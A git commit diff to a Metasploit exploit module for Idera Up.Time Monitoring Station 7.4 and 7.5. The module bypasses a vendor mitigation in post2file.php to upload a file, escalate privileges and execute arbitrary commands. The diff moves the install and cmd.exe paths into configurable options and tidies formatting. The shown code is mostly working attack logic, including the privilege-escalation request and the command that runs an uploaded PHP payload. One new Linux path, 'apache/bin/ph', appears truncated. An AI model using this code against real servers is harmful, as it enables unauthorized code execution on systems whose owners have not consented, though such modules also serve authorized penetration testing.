Update uptime_code_exec

2015-10-27 17:29:55 -05:00 · 2015-10-27 17:29:55 -05:00 · 592fdef93d
parent 181e7c4c75
commit 592fdef93d
1 changed files with 31 additions and 19 deletions
--- a/modules/exploits/multi/http/uptime_code_exec.rb
+++ b/modules/exploits/multi/http/uptime_code_exec.rb
@ -13,12 +13,17 @@ class Metasploit4 < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
-      'Name'            => 'Idera Uptime 7 post2file.php Arbitrary File Upload',
+      'Name'            => 'Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload',
      'Description'     => %q{
-        This module exploits a vulnerability found in Uptime
-        version 7.4.0 and 7.5.0 By supplying a specially
-        crafted request is possible to upload file and execute
-        arbitrary commands through privilege escalation.
+        This module exploits a vulnerability found in Uptime version 7.4.0 and 7.5.0.
+
+        The vulnerability began as a classic arbitrary file upload vulnerability in post2file.php,
+        which can be exploited by exploits/multi/http/uptime_file_upload_1.rb, but it was mitigated
+        by the vendor.
+
+        Although the mitigiation in place will prevent uptime_file_upload_1.rb from working, it
+        can still be bypassed and gain privilege escalation, and allows the attacker to upload file
+        again, and execute arbitrary commands.
      },
      'License'         => MSF_LICENSE,
      'Author'          =>
@ -48,6 +53,13 @@ class Metasploit4 < Msf::Exploit::Remote
        OptString.new('USERNAME', [true, 'The username to authenticate as', 'sample']),
        OptString.new('PASSWORD', [true, 'The password to authenticate with', 'sample'])
      ], self.class)
+
+    register_advanced_options(
+      [
+        OptString.new('UptimeWindowsDirectory', [true, 'Uptime installation path for Windows', 'C:\\Program Files\\uptime software\\']),
+        OptString.new('UptimeLinuxDirectory', [true, 'Uptime installation path for Linux', '/usr/local/uptime/']),
+        OptString.new('CmdPath', [true, 'Path to cmd.exe', 'c:\\windows\\system32\\cmd.exe'])
+      ], self.class)
  end

  def print_status(msg='')
@ -191,16 +203,16 @@ class Metasploit4 < Msf::Exploit::Remote
    phpfile_name = rand_text_alpha(10)
    if res_auth && res_auth.headers['Server'] =~ /Unix/
      vprint_status('Found Linux installation - Setting appropriated PATH')
-      phppath = '/usr/local/uptime/apache/bin/php'
-      uploadpath = '/usr/local/uptime/GUI/wizards'
+      phppath = Rex::FileUtils.normalize_unix_path(datastore['UptimeLinuxDirectory'], 'apache/bin/ph')
+      uploadpath = Rex::FileUtils.normalize_unix_path(datastore['UptimeLinuxDirectory'], 'GUI/wizards')

      cmdargs = "#{uploadpath}#{phpfile_name}.txt"
      cmd = phppath
    else
      vprint_status('Found Windows installation - Setting appropriated PATH')
-      phppath = 'C:\\Program Files\\uptime software\\uptime\\apache\\php\\php.exe'
-      uploadpath = 'C:\\Program Files\\uptime software\\uptime\\GUI\\wizards\\'
-      cmd = 'c:\\windows\\system32\\cmd.exe'
+      phppath = Rex::FileUtils.normalize_win_path(datastore['UptimeWindowsDirectory'], 'apache\\php\\php.exe')
+      uploadpath = Rex::FileUtils.normalize_win_path(datastore['UptimeWindowsDirectory'], 'uptime\\GUI\\wizards\\')
+      cmd = datastore['CmdPath']
      cmdargs = "/K \"\"#{phppath}\" \"#{uploadpath}#{phpfile_name}.txt\"\""
    end

@ -215,12 +227,12 @@ class Metasploit4 < Msf::Exploit::Remote
        'method' => 'GET',
        'uri'    => normalize_uri(target_uri.path, 'main.php'),
        'vars_get' => {
-          'page'          => 'Users',
-          'subPage'       => 'UserContainer'
+          'page'    => 'Users',
+          'subPage' => 'UserContainer'
        },
       'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}"
      )
-      matchdata = res_priv.body.match(/UPTIME.CurrentUser.userId.*/)
+      matchdata = res_priv.body.match(/UPTIME\.CurrentUser\.userId\.*/)
      get_id = matchdata[0].gsub(/[^\d]/, '')
      vprint_status('Escalating privileges...')

@ -273,8 +285,8 @@ class Metasploit4 < Msf::Exploit::Remote
        'method' => 'POST',
        'uri'    => normalize_uri(target_uri.path, 'index.php'),
        'vars_post' => {
-          'username'          => datastore['USERNAME'],
-          'password'          => datastore['PASSWORD']
+          'username' => datastore['USERNAME'],
+          'password' => datastore['PASSWORD']
        }
      )
      if res_auth && res_auth.get_cookies =~ /login=true/
@ -342,10 +354,10 @@ class Metasploit4 < Msf::Exploit::Remote
        'uri'    => normalize_uri(target_uri.path, 'main.php'),
        'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
        'vars_post' => {
-          'section'       => 'RunERDCInstance',
-          'subsection'    => 'view',
-          'id'            => mon_get_id,
-          'name'          => 'Exploit'
+          'section'    => 'RunERDCInstance',
+          'subsection' => 'view',
+          'id'         => mon_get_id,
+          'name'       => 'Exploit'
        }
      )
    else